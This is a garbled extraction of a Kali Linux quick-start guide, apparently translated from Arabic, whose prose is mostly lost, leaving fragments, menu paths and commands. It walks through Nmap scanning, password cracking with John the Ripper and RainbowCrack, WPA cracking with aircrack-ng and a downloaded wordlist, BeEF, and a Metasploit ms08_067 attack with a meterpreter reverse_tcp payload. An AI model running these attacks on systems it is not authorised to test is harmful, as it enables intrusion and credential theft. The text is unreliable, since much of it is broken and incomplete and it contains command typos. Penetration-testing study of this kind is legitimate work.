Professional Documents
Culture Documents
KALI LINUX
2014
kail linux
kali linux
kali
kali linux
Kali Linux VMware
kali
DNSmap
live hosts
SSL
kali
webScarab proxy
sqlninja
Websploit framework
John the Ripper
RainbowCrack
Kismet
Fern WIFI Cracker
Bluetooth auditing
Exploitation
Browser Exploitation Framework
Social Engineer Toolkit
Autopsy Forensic Browser
The Sleuth Kit
5
Nmap
Aircrack
Burp Suite
Burp proxy
Burp Spider
Burp Intruder
Metasploit Exploitation Framework
Kali Linux Network forensics
wireshark
Rootkit-scanning forensics with chkrootkit
md5deep
Official sites
Articles and tutorials
Community
Blogs
Twitter
Kali Linux
kali
.linux kali
....
:
Kali Linux kali Linux
.
.
Kali Linux
.
.Kali
.Kali Linux
5
.Kali Kali
:
.Nmap
.Aircrack
.Brup Suite
.Metasploit Exploitation Framework
SQL injection .sqlmap
digital forensics .Kali Linux
Twitter .
Kali Linux
,Kali Linux .
.
.
...
.
Kali Linux . Kali
Linux
.
:
033 .
.PCI
.C, Python, Ruby
.
:
ISO
Vmware images
ARM images
Kali .
.
:
Kali :
.12 GB
1 GB RAM .
.
ISO .http://www.kali.org/download
.
. .
.
.
. :
.Live boot
.Kali
.
.
.Kali
.Apply All Operations Gparted
.Kali
.Graphical install
...
. Kali .toor
.
.Gparted
.
.
Kali Linux .dual boot
Kali
Kali .
Vmware Image http://www.kali.org/download
.
Kali Linux Virtual Box ISO
.virtual box
.
. . Kali
ISO .
.
.VirtualBox guest addition
:
.1 :
cp /media/cd-rom/VboxLinuxAdditions.run /root/
.2 :
chmod 755 /root/VboxLinuxAdditions.run
.0 :
./VboxLinuxAdditions.run
Kali Linux
OS .patches
. terminal
:
apt-get update
Kali Linux
.
Kali Linux
. .Kali
Kali .Ubuntu Linux
:
:/etc/ .
:/opt/ metasploit .
:/sys/ .
:/root/ .
:/lib/ .
. .
.Application | Kali linux
Kali Linux
Kali Linux
Trace ,DNSmap ,)the network port mapper( Nmap .
.
DNSmap
Domain Name System
domain . www.Kali.org
HTTP .Kali
DNSmap subdomains domain.
terminal DNS
:www.rediff.com
root@kali:~#dnsmap rediff.com
.
Nmap .
.
:
root@kali:~#nmap h
UDP :
root@kali:~#nmap sU 192.168.5.0-255
live hosts
Fping host .
root@kali:~#fping google.com
google.com is live
SSL
SSLScan SSL SSL
.SSL
Dsniff .
. unlsnarf, WebSpy,
mailsnarf.
Netsniff .Linux
Netsniff-ng .
.mmap .pcap
online .offline
.
.
.
OpenVAS
.
OpenVAS
Application|Kali Linux|Vulnerability Analysis|OpenVAS
:
openvas-setup
.OpenVAS :terminal
root@kali:~#openvas-adduser
.ctrl + d
:
root@kali:~#openvas-nvt-sync
.
.Application|Kali Linux|Vulnerability Analysis|OpenVAS|openvas-gsd
.
.172.0.0.1
. .Task|New
:
. .
kali
.
.
.
.
.
Kali
.
WebScarab proxy
WebScarab HTTP HTTPS
. .
WebScarab XSS/CSRF
. WebScarab
:
.1 WebScarab Application|Kali Linux|Web
.applications|Web application proxies|Webscarab
.2 . proxy
120232321 .8338
.0 .WebScarab
Proxy . GET POST
.
.
sqlninja
Sqlninja SQL injunction
.Microsoft SQL
. sqlninja
.
sql ninja
.Applications|Kali Linux|Web applications|Database Exploitation|sqlninja
terminal .sqlninja
mode .m
m .
:
root@kali:~#sqlninja m test
sqlninja rel. 0.2.3-r1
Copyright (c) 2006-2008 icesurfer
][-] sqlninja.conf does not exist. You want to create it now ? [y/n
( .)sqlninja.conf
. .
The Websploit framework
Websploit
. Metasploit .
: terminal
wsf>update
[*]Updating websploit framework, please wait...
:
wdf>show modules
www.target.com
:
wsf>use web/dir_scanner
wsf:Dir_scanner>show options
wsf:Dir_scanner>set TARGET www.target.com
wsf:Dir_scanner>run
Websploit .
.
.
Kali .
online .offline
Kali .
John the Ripper
John the Ripper
Unix Hash Windows DES
kerberos .
John the Ripper Brute Force
.
Brute Force
.
John the Ripper :
.Applications|Kali Linux|Password Attacks|Offline Attack|John
Brute Force :
root@kali:~#john pwd
pwd .
:
root@kali:~#john show pwd
:
root@kali:~#john --wordlist=password.lst --rules pwd
RainbowCrack
RainbowCrack .John
rainbow Hashes
. RainbowCrack hash
rainbow .
.Brute Force
RainbowCrack :
.Applications|Kali Linux|Password Attacks|Offline Attacks|RainbowCrack
:
rcrack *.rt l hash.txt
:
.Applications|Kali Linux|Wireless Attacks|Wireless tools|Kismet
( )wlan0 Add
:
Kismet
. .
Kismet
.
Fern WIFI Cracker
Wi-Fi
. WEP/WPA/WPS
.Python
Kali .Reaver Python Scrapy Aircrack
: .
WEP Cracking with Fragmentation, Chop-Chop, Caffe-Latte, Hirte,
ARP Request Replay, or WPS attack.
WPA/WPA2 Cracking with dictionary or WPS-based attacks.
Automatic saving of the key in the database upon a successful crack.
Automatic access point attack system.
Session hijacking (passive and Ethernet modes).
Access point MAC address for geolocation tracking.
: Fern
.Applications|Kali Linux|Wireless Attacks|Wireless tools|Fern WIFI Cracker
.drop-down
Wi-Fi
(.)WPA, WEP, ...
OK .
.
Bluetooth auditing
Kali .bluetooth Bluetooth
.Bluetooth auditing Bluetooth .
.BlueRange
BlueRanger
BlueRanger .Bluetooth
pings Bluetooth
ping .
:BlueRanger
Applications|Kali Linux|Wireless Attacks|Bluetooth tools|BlueRanger.
Bluetooth SYNOPSIS
:
root@kali:~#blueranger.sh bci0 6C:D4:8A:B0:20:AC
.
beef beef .
Kali BeEF .
:
root@kali:/#apt-get update
root@kali:/#apt-get install beef-xss
:
root@kali:/#cd /ysr/share/beef-xss
root@kali:/#./beef
demo
.
BeEF .
:
:Getting Started .
:Logs .
:Current Browser .
. 6 .
:
:Details o .
:Logs o log .
:Commands o
.
:Rider o HTTP .
:XssRays o XSS .
.BeEF BeEF
demo .framework
. .1
. Spear-Phishing
Attack Vector .Create Social Engineering Template
.SET
SET .
SET .
Metasploit framework payload meterpeter connections
shells .
Forensics
Kali forensics
Forensics .
. Forensics
.
.Kali
Autopsy :
Applications|Kali Linux|Forensics|Digital Forensics|Autopsy.
:
localhost:9999/autopsy
/ .New Case
:
5
Kali Linux
.
.
Nmap
.
Nmap .
. console .namp
.Nmap .
IP :
root@kali:~#nmap 192.168.56.1
IP :
root@kali:~#nmap 192.168.56.1-255
port :
root@kali:~#nmap 192.168.56.1 p 80
ports :
root@kali:~#namp 192.168.56.0/24 p 1-1000
host :
nmap 192.168.56.0/24 --exclude 192.168.1.5
nmap 192.168.56.0/24 --exclude 192.168.1.5,192.168.1.254
:
nmap -F 192.168.56.1
:
nmap -A 192.168.56.1
nmap -v -A 192.168.56.1
:IP
nmap -sA 192.168.1.254
Nmap
:
nmap -PN 192.168.1.1
:
nmap --packet-trace 192.168.1.1
:
nmap sV 192.168.56.1
TCP SYN :
nmap sS 192.168.56.1
TCP TCP
:
nmap sT 192.168.56.1
UDP :
nmap sU 192.168.56.1
:
Nmap sU 192.168.56.1 > scan.txt
Nmap .
.
Aircrack
.Kali Fern WIFI cracker
.
.
. google .
.USB
:Wi-Fi
.1 .
.iwconfig
.wlan0
:
root@kali:~#ifconfig wlan0 up
.2 .
:
root@kali:~#iwlist wlan0 scan
.
.0 .monitoring mode
.monitoring mode
.
.airmon-ng
.monitoring mode :
root@kali:~#airmon-ng start wlan0
monitoring mode .
. ifconfig mon0
.monitoring
.4 .
.
airodump-ng . :
airodump-ng c (channel) w (filename) --bssid (bssid) mon0
.
.132333
.5 .
.root )crack-01.cap( *.cap
. aircrack-ng
. dark0de.lst
. http://www.filecrop.com/dark0de.lst.html
:
root@kali:~#aircrack-ng crack-01.cap w dark0de.lst
.
.
.aircrack-ng
Burp Suite
Burp suite .
Kali .
. :
Applications|Kali Linux|Web Applications|Web Application Fuzzers|Burp
Suite.
Burp Suite :
Proxy .
.
.
.
.
Burp Suite .
.Burp Suite
Burp proxy
proxy .
.man-in-the-middle
.proxy proxy localhost
.8333
Burp Intruder
.
.
Burp Inruder 4 .Target, Positions, Payloads, Options :
target . .102232321
Positions .
.
.Sniper attack, battering ram attack, pitchfork attack, cluster bomb
Payloads
. SQL injunction postions
payload .injunction string
Options
.
.Burp Suite
.
functionalists that are required during penetration testing. Some if its base
functions include logging, configuring, database storage, meterpreter
scripting, and so on.
Auxiliary modules: This is one of the major features of Metasploit. Auxiliary
modules are specific function modules that can perform a variety of tasks
both pre and post exploitation. Some of its chief functionalities include
scanning, information gathering, launching specific attacks, OS detection,
service detection, and so on.
Packaged tools: Metasploit comes with several handy tools that can further
enhance the penetration testing experience. These add-on packages can
create standalone payloads and encrypt the payloads using different
algorithms, database connectivity, the GUI interface, and so on.
Third-party plugins: Metasploit can integrate with several third-party
plugins and use its results to build its own attack structure. Results from
various tools, such as Nmap, Nessus, and NeXpose, can be used directly within
the framework.
Open source: The free version of Metasploit is open source, so it can be fully
extended and modified as needed.
: Metasploit
Applications|Kali Linux|Top 10 security tools|Metasploit Framework
Metasploit msf> console
.
. Metasploit
. Nmap
msf > namp 192.168.56.1/24
:
Nmap 4 . Windows XP
Nmap .192.168.56.102
Windows XP remote exploit .XP
. netapi
.Metasploit
msf > search netapi
.PAYLOAD:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
meterpreter .
show options . LHOST IP IP
.
. exploit .
console meterpreter
payload .
Metasploit
Metasploit .exploit .
.Metasploit
.kali Linux
.
.
.
.
Wireshark Kali :
Applications|Kali Linux|Top 10 security tools|Wireshark
.
. Start .
.
Capture panel .
Packet details panel .
Packet bytes panel .capture panel packet details
. . options
.
Rootkit-scanning forensics with chkrootkit
Rootkit
Kali . rootkit .chkrootkit :
Applications|Kali Linux|Forensics|Digital anti-forensics|chkrootkit
chkrootkit Chkrootkit .
.
md5deep
md5deep hash message digests
. signature
. MD5 signature
. MD5 MD5
.
md5deep . :
Applications|Kali Linux|Forensics|Forensics Hashing Tools|md5deep
signatures :
root@kali:~#md5deep r /darklord > darklordmd5.sum
:
root@kali:~#md5deep rx darklordmd5.sum
Kali Linux
.
Official sites
:
Homepage: http://www.kali.org
Manual and documentation: http://docs.kali.org
Blog: http://www.kali.org/blog/
Source code: http://git.kali.org/gitweb/
Articles and tutorials
:Kali
Backtrack is reborn-kali:
www.offensive-security.com/offsec/backtrack-rebornkali-linux/
Easily Accessing Wireless network with Kali Linux:
https://community.rapid7.com/community/infosec/blog
/2013/05/22/easily-assessing-wireless-network-withkali-linux
Kali Linux cracks passwords on an enterprise level:
http://lifehacker.com/5990375/kali-linux-crackspasswords-on-the-enterprise-level
Installing Vmware tools on Kali Linux:
http://www.drchaos.com/installing-vmware-tools-onkali-linux/
Community
: Kali Linux community
Blogs
:
Learning security tips:
http://www.securitytube.net
Metasploit unleashed , a project by founder of kali:
http://www.offensive-security.com/metasploitunleashed/Main_Page
Video tutorials on Kali:
http://cyberarms.wordpress.com/2013/07/01/videotraining-kali-linux-assuring-security-by-penetrationtesting/
Cyber Attack management with Armitage:
http://www.fastandeasyhacking.com/
Twitter
:
Kali Linux on Twitter: https://twitter.com/kalilinux
MalwareMustDie, NPO on Twitter:
https://twitter.com/malwaremustdie
Kali Linux
INSTANT KALI
LINUX
QUICK GUIDE
2014